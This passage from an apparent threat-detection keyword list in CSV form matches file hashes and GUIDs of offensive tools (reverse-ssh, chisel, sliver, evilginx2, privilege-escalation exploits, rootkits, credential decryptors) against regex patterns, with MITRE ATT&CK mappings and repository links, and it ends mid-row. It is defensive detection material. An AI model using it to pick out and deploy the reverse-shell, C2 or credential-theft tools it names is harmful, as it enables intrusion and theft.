"*19a43d7ebc516f2344e6ffac66205d54cbde907e2eb1fb6171934d292524c5c7*",".{0,1000}19a43d7ebc516f2344e6ffac66205d54cbde907e2eb1fb6171934d292524c5c7.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*19d2b32e9801a4f959ce59e251879d9a42ac749e2e702a8ceab2ddee2d71bbb1*",".{0,1000}19d2b32e9801a4f959ce59e251879d9a42ac749e2e702a8ceab2ddee2d71bbb1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*19dc8d8108bab9207905b08b57193efc9fd4e13f2cb901c7ca1ffd727cd62e4a*",".{0,1000}19dc8d8108bab9207905b08b57193efc9fd4e13f2cb901c7ca1ffd727cd62e4a.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*19f900f1332f1cb5895c079d90c982f7eae6cb67f989116a3cbba5101fbbe9b1*",".{0,1000}19f900f1332f1cb5895c079d90c982f7eae6cb67f989116a3cbba5101fbbe9b1.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*1a279f5df4103743b823ec2a6a08436fdf63fe30*",".{0,1000}1a279f5df4103743b823ec2a6a08436fdf63fe30.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - 
T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*1a4a751f7044db4952d7e6607f24ade9ebbddbf2c6665de8cae3e7027df28dd2*",".{0,1000}1a4a751f7044db4952d7e6607f24ade9ebbddbf2c6665de8cae3e7027df28dd2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1a524806875110320dacb05bb8a00bbe07f8618ff23a82effad887df9952f459*",".{0,1000}1a524806875110320dacb05bb8a00bbe07f8618ff23a82effad887df9952f459.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*1a661c04442e03afed5683e5d92798b9be628e197ba047ac45b7d831444fc3fe*",".{0,1000}1a661c04442e03afed5683e5d92798b9be628e197ba047ac45b7d831444fc3fe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*1A8C9BD8-1800-46B0-8E22-7D3823C68366*",".{0,1000}1A8C9BD8\-1800\-46B0\-8E22\-7D3823C68366.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","0","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*1aa9f8c15c189d98c2f6e05c511bd3452543a3ba700d9a6b5f3279ce8a1fcaea*",".{0,1000}1aa9f8c15c189d98c2f6e05c511bd3452543a3ba700d9a6b5f3279ce8a1fcaea.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1aec829442fb9d5d32cb59019f608c9e98af9ebff8b56168f38ac5e222c888ba*",".{0,1000}1aec829442fb9d5d32cb59019f608c9e98af9ebff8b56168f38ac5e222c888ba.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" 
"*1af9e71cddf3b8cc8d9bd5004d29fc594400452a727856db23af24a0e3999de7*",".{0,1000}1af9e71cddf3b8cc8d9bd5004d29fc594400452a727856db23af24a0e3999de7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1AFD1BA3-028A-4E0F-82A8-095F38694ECF*",".{0,1000}1AFD1BA3\-028A\-4E0F\-82A8\-095F38694ECF.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*1B1F64B3-B8A4-4BBB-BB66-F020E2D4F288*",".{0,1000}1B1F64B3\-B8A4\-4BBB\-BB66\-F020E2D4F288.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*1b220d5538e63244c3b81a0c7a83ebb9ac7b0cdaed9f3e84057a812d7192b9b2*",".{0,1000}1b220d5538e63244c3b81a0c7a83ebb9ac7b0cdaed9f3e84057a812d7192b9b2.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid 
binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*1b38d47cdafe878dabc195a125987f06d04730fa8ac836ffad80e5f3d5721a8a*",".{0,1000}1b38d47cdafe878dabc195a125987f06d04730fa8ac836ffad80e5f3d5721a8a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1B3C96A3-F698-472B-B786-6FED7A205159*",".{0,1000}1B3C96A3\-F698\-472B\-B786\-6FED7A205159.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*1b4874bdc2c7947b4ff389e6f408f10b44376bff4d5404040a4b01fdacfe2dec*",".{0,1000}1b4874bdc2c7947b4ff389e6f408f10b44376bff4d5404040a4b01fdacfe2dec.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1B52A3D9-014C-4CBF-BB98-09080D9A8D16*",".{0,1000}1B52A3D9\-014C\-4CBF\-BB98\-09080D9A8D16.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*1b578e26adc91f95143cb5c8dcfa9c0baf76923ea2295cc45e2e7a99bd4a763c*",".{0,1000}1b578e26adc91f95143cb5c8dcfa9c0baf76923ea2295cc45e2e7a99bd4a763c.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*1b5b1dcea5728489f0373d6f8f351d69912498c61829ceccf5c5d0233bf0c852*",".{0,1000}1b5b1dcea5728489f0373d6f8f351d69912498c61829ceccf5c5d0233bf0c852.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 
","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*1b789e0e641506e259b2e4e2a64dac2654f224dcaf4d57da0634ce4774eb9b90*",".{0,1000}1b789e0e641506e259b2e4e2a64dac2654f224dcaf4d57da0634ce4774eb9b90.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*1b9b3211b26dcb730d47fa8e7bd97a2c3d5bc4b740a1c6c15fb690c87cd12031*",".{0,1000}1b9b3211b26dcb730d47fa8e7bd97a2c3d5bc4b740a1c6c15fb690c87cd12031.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1ba38ae7e6c55fd66b21d40178341d18c195991c23044e030c3096746a2e1266*",".{0,1000}1ba38ae7e6c55fd66b21d40178341d18c195991c23044e030c3096746a2e1266.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*1BACEDDC-CD87-41DC-948C-1C12F960BECB*",".{0,1000}1BACEDDC\-CD87\-41DC\-948C\-1C12F960BECB.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","179","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*1bc3fc0ecdae8f404c33942914e6f442ea91400bdea77322b318ab576d4050a9*",".{0,1000}1bc3fc0ecdae8f404c33942914e6f442ea91400bdea77322b318ab576d4050a9.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*1bc8fca2c5b410f9c0bbfff18af3dc6295f2a8b8d7c2ba953e282b6a0bc6214c*",".{0,1000}1bc8fca2c5b410f9c0bbfff18af3dc6295f2a8b8d7c2ba953e282b6a0bc6214c.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*1bd59761e0390b6dee196b67f5cfd3b0dae73cdb5905815cd4ae9d5ae02293f7*",".{0,1000}1bd59761e0390b6dee196b67f5cfd3b0dae73cdb5905815cd4ae9d5ae02293f7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team 
framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1be8d887faf0e80185a811e2c3a734117dcd081136d088295356bb5ddc6395be*",".{0,1000}1be8d887faf0e80185a811e2c3a734117dcd081136d088295356bb5ddc6395be.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E*",".{0,1000}1BF9C10F\-6F89\-4520\-9D2E\-AAF17D17BA5E.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*1bff5a9cb5275afd7b7d4bf2d3087f1b3bf94864c4decf73f1c82922ad646d2f*",".{0,1000}1bff5a9cb5275afd7b7d4bf2d3087f1b3bf94864c4decf73f1c82922ad646d2f.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*1c008a8214c1fa6b06500d92a76900314b9f889818d6dae55f274f3a95d874b6*",".{0,1000}1c008a8214c1fa6b06500d92a76900314b9f889818d6dae55f274f3a95d874b6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1c0f922ca54295ab3f496fded2eada45fa166e32b34bdefc838ba3919c679208*",".{0,1000}1c0f922ca54295ab3f496fded2eada45fa166e32b34bdefc838ba3919c679208.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1c267e901a65d142bf532bc0d26926dd9ceaa43e16b48df37c0739ba050a1c50*",".{0,1000}1c267e901a65d142bf532bc0d26926dd9ceaa43e16b48df37c0739ba050a1c50.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*1c50adeb-53ac-41b9-9c34-7045cffbae45*",".{0,1000}1c50adeb\-53ac\-41b9\-9c34\-7045cffbae45.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login 
page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*1C5EDA8C-D27F-44A4-A156-6F863477194D*",".{0,1000}1C5EDA8C\-D27F\-44A4\-A156\-6F863477194D.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*1c6b60ff20f7c26a7436d966fc741ecd05dc2b3326de1ebcd7fcf6142ac24409*",".{0,1000}1c6b60ff20f7c26a7436d966fc741ecd05dc2b3326de1ebcd7fcf6142ac24409.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*1c7e93ed2b3eed1303cc11d09b4fea4b183fb0e7041f9584c81ca4c989d8a46f*",".{0,1000}1c7e93ed2b3eed1303cc11d09b4fea4b183fb0e7041f9584c81ca4c989d8a46f.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*1c841d5d1d34538febdda50a60f9e4f7a9df773a40dccacbd6aaa75595babfdb*",".{0,1000}1c841d5d1d34538febdda50a60f9e4f7a9df773a40dccacbd6aaa75595babfdb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel 
over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1c9a4023737f0be81e06da3719ab68310dca400ca15cfb63012949215fb694eb*",".{0,1000}1c9a4023737f0be81e06da3719ab68310dca400ca15cfb63012949215fb694eb.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*1cc45acf429d705ee592af1c9e56ac25f5b5acbc27fe555db5007c8be9cc4c42*",".{0,1000}1cc45acf429d705ee592af1c9e56ac25f5b5acbc27fe555db5007c8be9cc4c42.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*1d015455d5d224c4a3a39c9f43d7c057bd5aebad39b04e831d2fa517d94add09*",".{0,1000}1d015455d5d224c4a3a39c9f43d7c057bd5aebad39b04e831d2fa517d94add09.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1d267caeb15c945b29b8a7c377582036ac1f72e2a977042947f149f099b5ffcb*",".{0,1000}1d267caeb15c945b29b8a7c377582036ac1f72e2a977042947f149f099b5ffcb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1d2c6cbd5fc288ffb92db49344a394eba6d3418df04bd6178007a33b8d82178e*",".{0,1000}1d2c6cbd5fc288ffb92db49344a394eba6d3418df04bd6178007a33b8d82178e.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*1d3480472e9ab2c37d65f2278d4ca4a2fe32ac65953c828fbedddb371ae44cc7*",".{0,1000}1d3480472e9ab2c37d65f2278d4ca4a2fe32ac65953c828fbedddb371ae44cc7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1d3d87c94b03ba803b6af7fd142dd874aa26a2754aa6874b7c498d26ff6152e2*",".{0,1000}1d3d87c94b03ba803b6af7fd142dd874aa26a2754aa6874b7c498d26ff6152e2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*1d523c11769bcf3b85ae63c7d023e531962f46e04dc485c87d69bff6e31635ef*",".{0,1000}1d523c11769bcf3b85ae63c7d023e531962f46e04dc485c87d69bff6e31635ef.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*1d9b4121c2dbc17a4db31341da2097cd430a61201c57185a42fb687f22f704eb*",".{0,1000}1d9b4121c2dbc17a4db31341da2097cd430a61201c57185a42fb687f22f704eb.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*1da68fc3d86dc4d5d67359180fbeb8ad68ae90e347d1a9c12f77e21959c25efa*",".{0,1000}1da68fc3d86dc4d5d67359180fbeb8ad68ae90e347d1a9c12f77e21959c25efa.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 